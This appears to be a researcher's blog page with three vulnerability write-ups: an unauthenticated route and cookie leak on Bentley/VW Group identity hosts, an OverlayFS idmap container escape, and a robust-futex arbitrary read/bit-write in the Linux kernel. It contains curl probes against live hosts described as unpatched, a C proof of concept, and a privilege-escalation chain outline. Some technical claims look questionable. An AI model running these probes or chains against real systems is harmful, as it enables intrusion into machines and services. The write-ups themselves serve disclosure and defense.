XMRgang

high unpatched bentley vw group

Broken Access Control & Auth Info Leak on id.bentleymotors.com

security misconfiguration & session misconfiguration on id.bentleymotors.com / id.vwgroup.io

tl;dr Stumbled onto Bentley's identity platform while doing recon and realized it was actually VW Group shared infra. The internal app shell was being served unauthenticated on a route NGINX forgot to lock down, and failed auth attempts were leaking session cookies and internal header info. Reported it. Still unpatched as of writing.

01 the recon

Was doing some passive recon on bentleymotors.com and stumbled onto a subdomain I hadn't seen before, id.bentleymotors.com. Running NGINX, clearly some kind of identity / login portal. Looked custom-built, which is always interesting because custom auth flows tend to have weird edges.

The first thing that caught my eye was the CSP header. Buried in img-src there was a wildcard pointing at https://*.vwgroup.io. That's a pretty strong signal this isn't actually a Bentley-owned stack. It's VW Group's shared "Identity Kit" platform that Bentley just happens to be a tenant on. Filed that away for later because it ends up mattering.
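
To make the CSP observation concrete, here is a minimal sketch of pulling wildcard hosts out of a policy string. The function names are mine, and the sample value is modelled on the img-src fragment from the response shown later in this post (the default-src part is invented for the example). It works on a string you already have and makes no requests.

```python
def parse_csp(header_value: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    policy: dict[str, list[str]] = {}
    for chunk in header_value.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        # A repeated directive is ignored after its first occurrence.
        policy.setdefault(name, tokens[1:])
    return policy


def wildcard_hosts(policy: dict[str, list[str]]) -> set[str]:
    """Collect sources that contain a wildcard label such as https://*.example.org."""
    hosts = set()
    for sources in policy.values():
        for source in sources:
            if "*." in source:
                hosts.add(source)
    return hosts


# Assumed sample; only the img-src part comes from the write-up.
sample = "default-src 'self'; img-src 'self' blob: data: https://*.vwgroup.io"
policy = parse_csp(sample)
print(policy["img-src"])
print(wildcard_hosts(policy))
```

A wildcard host under a different parent domain than the site itself is the kind of thing worth writing down early, since it hints at who actually runs the stack.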

02 the landing page that shouldn't have loaded

Started mapping routes. Most of them behaved. Hit /api/profile unauthenticated, got bounced with a 401, no big surprise. Then I tried /landing-page.

$ curl -s -w "\nStatus: %{http_code}\n" https://id.bentleymotors.com/landing-page
# Returns: Status: 200 (Dumps internal app HTML/JS)

200 OK. Full internal application shell. HTML, JS routing, the API map, all of it, served to me with no session, no token, nothing. The frontend auth guard was clearly doing its job client-side, but the server wasn't enforcing anything on this route. Classic case of trusting the SPA to handle auth.

Remembering the VW Group CSP tie-in, I pointed the same request at id.vwgroup.io. Identical behavior, same route, same 200, same dump.

$ curl -s -w "\nStatus: %{http_code}\n" https://id.vwgroup.io/landing-page
# Returns: Status: 200 (Dumps internal app HTML/JS)

So this isn't a Bentley misconfiguration. It's a misconfiguration in the underlying Identity Kit platform that every VW Group tenant is inheriting. That raised the scope question real fast.

03 the cookie that shouldn't exist

While poking at authenticated routes, I noticed something weirder. Hit the OAuth callback with a bogus redirect:

$ curl -s -I "https://id.bentleymotors.com/authorized/callback?redirect_uri=https://tester.com"

HTTP/2 401
set-cookie: identity-kit-profile-session=[TOKEN]; Expires=...; HttpOnly
www-authenticate: Bearer error="Missing access token in cookies"
content-security-policy: ... img-src 'self' blob: data: https://*.vwgroup.io; ...

Two things wrong here. First, the www-authenticate header is telling me exactly where the app expects the access token to live ("in cookies"). That's free intel for an attacker: no need to guess where to stuff a stolen token.

Second, and this is the weird one, a failed 401 auth attempt is mutating state. The server is issuing a valid session cookie (identity-kit-profile-session) on a request that just got rejected. Error responses shouldn't be writing session state. At minimum it's sloppy, at worst it could be abused depending on what downstream code trusts that cookie's presence.
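
Both observations can be turned into a small offline check. This is a sketch, not a scanner: the function name and the finding strings are my own, and it only inspects a status code and header list that you have already captured.

```python
def audit_error_response(status: int, headers: list[tuple[str, str]]) -> list[str]:
    """Flag error responses that set cookies or describe the auth failure in detail."""
    findings = []
    if 400 <= status < 600:
        for name, value in headers:
            lname = name.lower()
            if lname == "set-cookie":
                # Keep only the cookie name; the value is not needed for the report.
                cookie_name = value.split("=", 1)[0].strip()
                findings.append(f"error response sets cookie: {cookie_name}")
            elif lname == "www-authenticate" and "error=" in value.lower():
                findings.append("www-authenticate carries a descriptive error string")
    return findings


# Headers copied from the 401 response above, with the token left redacted.
observed = [
    ("set-cookie", "identity-kit-profile-session=[TOKEN]; HttpOnly"),
    ("www-authenticate", 'Bearer error="Missing access token in cookies"'),
]
print(audit_error_response(401, observed))
```

The same headers on a 200 would not be flagged, which is the point: the problem is state being written on a rejected request, not the cookie itself.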

04 stopping point

The moment I confirmed this was VW Group shared infrastructure and not just Bentley, I stopped. Bentley's bug bounty scope is Bentley's IT systems, and going further on a platform that handles identity for the entire VW Group would've blown past that line. Reported both findings to Bentley, noted the VW Group tie-in, and let them handle escalation internally.

As of writing, both issues are still unpatched. The landing page route still serves the internal app shell to unauthenticated users, and the 401 response still sets a session cookie and discloses where the app expects the access token.

critical patched kernel overlayfs containers

OverlayFS nop_mnt_idmap Bug

container escape / LPE via idmapped mount bypass in fs/overlayfs/inode.c

tl;dr OverlayFS takes an idmap argument from the VFS for setattr, permission, and set_acl calls, but ignores it and passes nop_mnt_idmap (identity mapping) instead. Inside a container with user namespaces + idmapped mounts, this means container UID 0 gets treated as host UID 0 during OverlayFS operations. Container escape, no setuid needed. Reported and patched upstream.

01 the setup

Was hunting for LPE primitives that don't need setuid. Spent a while on race conditions in the VFS layer, kept hitting dead ends, and pivoted to logic bugs in the idmapping chain. The idmapped mount feature is relatively new and the interaction with OverlayFS felt underexplored, so I started reading fs/overlayfs/inode.c.

The setup that matters: a host running a container with a user namespace, where container UID 0 maps to something like host UID 100000. Inside that container, you mount an idmapped mount that does the UID translation, and then you stack OverlayFS on top of it. The lower layer is the idmapped mount, the upper layer is container-local. The kernel is supposed to use the idmap for every permission check on the OverlayFS files so the container's UID 0 never gets confused with host UID 0.

02 the bug

The functions in inode.c receive the correct idmap argument from the VFS, then throw it away and use &nop_mnt_idmap instead. nop_mnt_idmap is the identity mapping, meaning no UID/GID translation happens at all.

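// fs/overlayfs/inode.c (abridged excerpts)

int ovl_setattr(struct mnt_idmap *idmap, struct dentry *dentry,
                struct iattr *attr)
{
    int err;

    // BUG: receives idmap, ignores it, uses identity mapping
    err = setattr_prepare(&nop_mnt_idmap, dentry, attr);  // WRONG
    // should be: setattr_prepare(idmap, dentry, attr);
    if (err)
        return err;
    // ... rest of the function omitted ...
}

int ovl_permission(struct mnt_idmap *idmap, struct inode *inode, int mask)
{
    int err;

    // same pattern: the idmap parameter is never used
    err = generic_permission(&nop_mnt_idmap, inode, mask);  // WRONG
    // should be: generic_permission(idmap, inode, mask);
    // ... rest of the function omitted ...
}

// ovl_set_acl() lines 537 and 546 are also affected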

So every permission check on OverlayFS files goes through the identity map. Container UID 0, which the host is supposed to translate to UID 100000, never gets translated. It's just UID 0 all the way down.
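
The difference between a real mapping and the identity mapping is easy to see in a toy model. This is a userspace illustration, not kernel code: the names are mine, the 0 → 100000 mapping is the one from the setup above, and the range length of 65536 is an assumption picked for the example.

```python
from typing import NamedTuple, Optional


class IdMapRange(NamedTuple):
    inside_start: int   # first ID as seen inside the container
    outside_start: int  # host ID that inside_start corresponds to
    count: int          # number of consecutive IDs covered


def map_to_host(uid: int, ranges: list[IdMapRange]) -> Optional[int]:
    """Translate a container UID to a host UID; None means the UID is unmapped."""
    for r in ranges:
        if r.inside_start <= uid < r.inside_start + r.count:
            return r.outside_start + (uid - r.inside_start)
    return None


def identity(uid: int) -> int:
    """Stand-in for an identity mapping: the UID passes through untranslated."""
    return uid


# Assumed range length; the write-up only states that 0 maps to 100000.
container_map = [IdMapRange(inside_start=0, outside_start=100000, count=65536)]

print(map_to_host(0, container_map))  # 100000
print(identity(0))                    # 0
```

With the mapping applied, container root lands on an unprivileged host UID. With the identity stand-in, the same input stays 0, which is the confusion this section describes.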

03 the primitive

The attack chain is straightforward once the bug is clear. Inside the container, you create a file through the OverlayFS mount. Then you chmod or chown it. Because ovl_setattr uses nop_mnt_idmap, the ownership change happens in the host's UID space directly, with no translation. Container UID 0 becomes host UID 0. The permission check passes because, as far as the kernel is concerned, you ARE UID 0 on the host.

HOST (UID 0)
  └── container namespace (UID 0  →  host UID 100000)
        └── idmapped mount (/idmapped, with mapping)
              └── OverlayFS mounted on top
                    └── lowerdir=/idmapped, upperdir=...

attack:
  1. container process creates a file via OverlayFS
  2. calls chmod / chown on the file
  3. ovl_setattr() uses nop_mnt_idmap (identity)
  4. container UID 0 treated as host UID 0
  5. permission check passes incorrectly
  6. result: container has access to host files

No setuid file involved. No race condition. No kernel address leak needed. The whole thing is a clean logic bug.

A minimal PoC looks like this:

// run inside a container with a user namespace + idmapped mount + overlayfs
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int fd = open("/overlay/test", O_CREAT|O_WRONLY, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    close(fd);

    // should go through the idmap, but doesn't
    if (chown("/overlay/test", 0, 0) < 0) {  // UID 0 in container
        perror("chown");
        return 1;
    }

    // file now has UID 0 on the host. escaped.
    return 0;
}

04 other stuff I noticed while in there

While auditing around the same area I found a handful of other permission gaps. None of them are as clean as the OverlayFS one, but they're worth noting.

#2 lookup_noperm skips permission checks (fs/namei.c:3086-3382)

lookup_noperm and friends do a dcache lookup with no inode_permission() call. They're exported to filesystem modules. A malicious or buggy module can use them to walk paths without DAC checks. Severity is high but you need a filesystem module, which limits the attack surface.

#3 O_PATH skips LSM hooks (fs/open.c:898-903)

Opening a file with O_PATH sets f_op = &empty_fops and returns early, before security_file_open() and fsnotify_open_perm() get called. You can then reopen the fd via /proc/self/fd/ and the LSM never sees the original open. Medium severity, but useful for flying under monitoring.

#4 xattr security.* and system.* skip DAC (fs/xattr.c:120-138)

Setting xattrs with the security. or system. prefix skips the inode_permission() call entirely. You can write security xattrs without proper DAC checks. Medium severity.

#5 ATTR_FORCE bypasses all permission checks (fs/attr.c:187-189)

If ATTR_FORCE is set in the iattr mask, the code jumps straight to kill_priv and skips every permission check. Internal callers or buggy filesystems can use this to bypass chown/chmod checks entirely. Medium, internal-triggered.

05 stuff I haven't fully verified

Two more threads I want to pull on but haven't confirmed yet.

FUSE as OverlayFS lower layer. If the kernel allows a FUSE filesystem as the lower layer of an OverlayFS mount, you could craft a FUSE fs that returns files owned by the attacker with capability xattrs set. When OverlayFS does copy-up, the upper layer ends up with attacker-owned files with capabilities. That would be critical if it works. I haven't verified whether the kernel actually allows FUSE as a lower layer yet.

Idmapped mount edge cases. When a mapping fails, the kernel ends up with INVALID_UID ((uid_t)-1), which userspace sees as the overflow UID (65534 / nobody). That fallback could grant access to files owned by unmapped UIDs. There's also a potential capability namespace mismatch in capable_wrt_inode_uidgid(), which uses mnt_userns while the inode UID might be in a different namespace. Nested namespaces with overlapping mappings could cause privilege confusion. Both need verification.

06 priority + status

vuln	sev	exploitable	no setuid	priority
nop_mnt_idmap	critical	yes	yes	#1
FUSE lower layer	critical	tbd	yes	#2
lookup_noperm	high	needs module	yes	#3
idmapped mount bugs	high	tbd	yes	#4
O_PATH bypass	med	yes	yes	#5
xattr DAC skip	med	yes	yes	#6
ATTR_FORCE bypass	med	internal	yes	#7

The fix for the main bug is a one-liner per call site. Pass the idmap that was already passed in.

--- a/fs/overlayfs/inode.c
+++ b/fs/overlayfs/inode.c
@@ -29,7 +29,7 @@ int ovl_setattr(struct mnt_idmap *idmap, struct dentry *dentry,
       bool full_copy_up = false;
       struct dentry *upperdentry;

-      err = setattr_prepare(&nop_mnt_idmap, dentry, attr);
+      err = setattr_prepare(idmap, dentry, attr);
       if (err)
               return err;

Same fix in ovl_permission() at line 309 and ovl_set_acl() at lines 537 and 546. Reported and patched upstream.

high unpatched kernel futex lpe

Robust List Arbitrary Address Write

signed futex_offset with no validation in kernel/futex/core.c

tl;dr When a thread exits, the kernel walks its robust futex list and calls handle_futex_death() on each entry. The address it operates on is computed as entry + futex_offset, where futex_offset is a signed 64-bit long read from userspace with zero validation. You can point it at any userspace address. The kernel will read from that address and, if a TID condition matches, set bit 30 on it. Arbitrary address read plus a conditional single-bit write primitive, no setuid needed.

01 the recon

Was looking at the futex subsystem on Linux 6.12.74+deb13+1-amd64. Originally chasing race conditions in the private hash code, but CONFIG_FUTEX_PRIVATE_HASH isn't compiled into this kernel and the FUTEX2_NUMA TOCTOU path isn't implemented. Dead ends. Pivoted to the robust futex list, which is older code and gets walked every time a thread exits.

The relevant path is exit_robust_list() calling into handle_futex_death(). The list head lives in userspace. The kernel reads it, walks the entries, and for each entry computes the futex address as entry + futex_offset.

02 the offset bug

futex_offset is a signed 64-bit long read straight from userspace with get_user. No bounds check, no VMA validation, no magnitude check, no verification that the computed address is inside the process's own memory. Positive offset goes forward from entry, negative offset goes backward, full 64-bit range.

// kernel/futex/core.c, exit_robust_list()
if (get_user(futex_offset, &head->futex_offset))  // signed long, no bounds check
    return;

// later, computed address passed straight to handle_futex_death()
handle_futex_death((void __user *)entry + futex_offset, curr, pi, ...);
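
The address arithmetic in that excerpt can be modelled in a few lines. This is a sketch of 64-bit pointer-plus-signed-offset math only: the helper names and the entry value are hypothetical, and nothing here touches a futex.

```python
MASK64 = (1 << 64) - 1


def to_signed64(value: int) -> int:
    """Interpret the low 64 bits of value as a signed two's-complement long."""
    value &= MASK64
    return value - (1 << 64) if value & (1 << 63) else value


def futex_address(entry: int, futex_offset: int) -> int:
    """Model (void __user *)entry + futex_offset with 64-bit wraparound."""
    return (entry + to_signed64(futex_offset)) & MASK64


entry = 0x7F0000001000  # hypothetical list entry address

print(hex(futex_address(entry, 0x18)))                # small positive offset
print(hex(futex_address(entry, -0x1000)))             # negative offset, one page back
print(hex(futex_address(entry, 0xFFFFFFFFFFFFF000)))  # same offset as a raw 64-bit pattern
```

The last two calls land on the same address, since a large unsigned bit pattern and a negative long are the same 64 bits.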

The compat path (compat_exit_robust_list()) has the same bug, with the added weirdness that 32-bit compat mode truncates pointers, so the address calculation can land somewhere unexpected. Same root cause, slightly different shape.

03 the primitive

Inside handle_futex_death(), the kernel does a get_user on the computed address. That's an arbitrary userspace read. Then it masks the value with FUTEX_TID_MASK (0x3fffffff) and checks whether it equals the dying thread's TID. If it matches, it does a cmpxchg that sets bit 30 (FUTEX_OWNER_DIED).

// handle_futex_death()
if (get_user(uval, uaddr))
    return -1;

owner = uval & FUTEX_TID_MASK;  // 0x3fffffff
if (owner != task_pid_vnr(curr))
    return 0;

// conditional write to arbitrary address
mval = (uval & FUTEX_WAITERS) | FUTEX_OWNER_DIED;  // sets bit 30
futex_cmpxchg_value_locked(&nval, uaddr, uval, mval);

So the primitive is: read any userspace address, and if you can place the dying thread's TID in the low 30 bits at that address, set bit 30 on it. There's also a secondary path: if FUTEX_WAITERS (bit 31) is set and it's not a PI futex, the kernel calls futex_wake() on the arbitrary address. That gives you a cross-process futex wake primitive on addresses the dying task never actually held.

capability	details
read	arbitrary userspace read via get_user()
write condition	(value & 0x3fffffff) == dying_thread_tid
write effect	value = (value & 0x80000000) | 0x40000000
bit modified	bit 30 (OWNER_DIED)
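
The table's condition and effect can be checked with plain integer math. This sketch models only the steps quoted above (mask, compare, compute the new value). The constants are the standard futex values, while the function name and the example TID are mine.

```python
from typing import Optional

FUTEX_WAITERS = 0x80000000     # bit 31
FUTEX_OWNER_DIED = 0x40000000  # bit 30
FUTEX_TID_MASK = 0x3FFFFFFF    # low 30 bits


def owner_died_value(uval: int, tid: int) -> Optional[int]:
    """Return the value that would be written, or None if the TID check fails."""
    if (uval & FUTEX_TID_MASK) != tid:
        return None
    # Keep the WAITERS bit, set OWNER_DIED, drop the TID bits.
    return (uval & FUTEX_WAITERS) | FUTEX_OWNER_DIED


tid = 1234  # example TID
print(owner_died_value(tid, tid))                        # 1073741824
print(hex(owner_died_value(tid | FUTEX_WAITERS, tid)))   # 0xc0000000
print(owner_died_value(tid + 1, tid))                    # None
```

Note that the write is not a pure bit set: the low 30 bits (the TID) are cleared at the same time, so the word ends up as 0x40000000 or 0xc0000000 and nothing else.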

04 what you can actually do with it

The conditional bit-30 write is restrictive on its own, but the arbitrary read is immediately useful. You can leak stack canaries, heap pointers, and any other userspace data without any special privileges. The read doesn't require the TID condition, it fires on every list entry.

For the write, the TID condition is manageable. The dying thread's TID is known (it's the thread calling exit), so you pre-place that value at the target address before the thread exits. The bit-30 write can then corrupt a flags word in a data structure, which can cause logic bugs in whatever code consumes it. Note that kernel objects like struct file are out of reach here (get_user() only accepts userspace addresses, and FMODE_LSEEK lives in f_mode rather than f_flags anyway), so the target has to be a flags word in userspace memory.

The futex wake on arbitrary addresses is the most directly weaponizable path. If you point the robust list at an address in another process's memory where you've placed a value with the dying thread's TID in the low bits and FUTEX_WAITERS set, the kernel will call futex_wake() on that address. Any thread in the target process that's doing a FUTEX_WAIT on that address gets woken spuriously. That's a denial of service primitive, and in the right conditions it can desynchronize locking logic in multi-threaded programs.

05 turning it into LPE

The cleanest escalation path I see is using the arbitrary read to leak a pointer from the stack or heap, then using the conditional write to corrupt a function pointer or vtable entry. The bit-30 constraint means you need to find a target where setting that bit actually changes control flow. In practice this means targeting a flags field that gates a code path, not a pointer directly.

Alternatively, if you have a second vulnerability that gives you an arbitrary write (even a limited one), the futex primitive serves as the oracle. Read any address, use the information to calculate the right offset for the second vuln, and chain them. The futex bug doesn't need to be the final step, it just needs to be the information-leak step.

chain concept:
  1. set up robust list with futex_offset pointing at target
  2. pre-place dying_thread_tid at target address
  3. spawn thread, have it exit
  4. kernel reads target address (leak)
  5. if TID matches, kernel sets bit 30 (corruption)
  6. use leaked info + corrupted state for code execution

requirements:
  - no capabilities needed
  - no setuid binary needed
  - works from unprivileged user namespace
  - compat path gives same primitive on 32-bit

06 the fix that should exist

The fix is straightforward: validate futex_offset before using it. At minimum, check that entry + futex_offset falls within a valid VMA owned by the calling process. Ideally, cap the magnitude to something reasonable (page-aligned, within the range of the containing VMA).

--- a/kernel/futex/core.c
+++ b/kernel/futex/core.c
@@ -N,6 +N,9 @@ static void exit_robust_list(struct task_struct *curr)
 if (get_user(futex_offset, &head->futex_offset))
     return;

+/* access_ok() only rejects addresses outside the user address range; it does not check VMAs */
+if (!access_ok((void __user *)entry + futex_offset, sizeof(u32)))
+    return;

 handle_futex_death((void __user *)entry + futex_offset, curr, pi, &next);

Same fix needed in compat_exit_robust_list() with the appropriate 32-bit offset type. As of writing, this is unpatched. The robust list path has been stable for over a decade and nobody seems to have audited the offset handling.

07 status

property	value
kernel tested	6.12.74+deb13+1-amd64
primitive	arbitrary read + conditional bit-30 write + futex wake
privileges required	none
setuid needed	no
user namespace escape	requires chaining
patched	no
reported	pending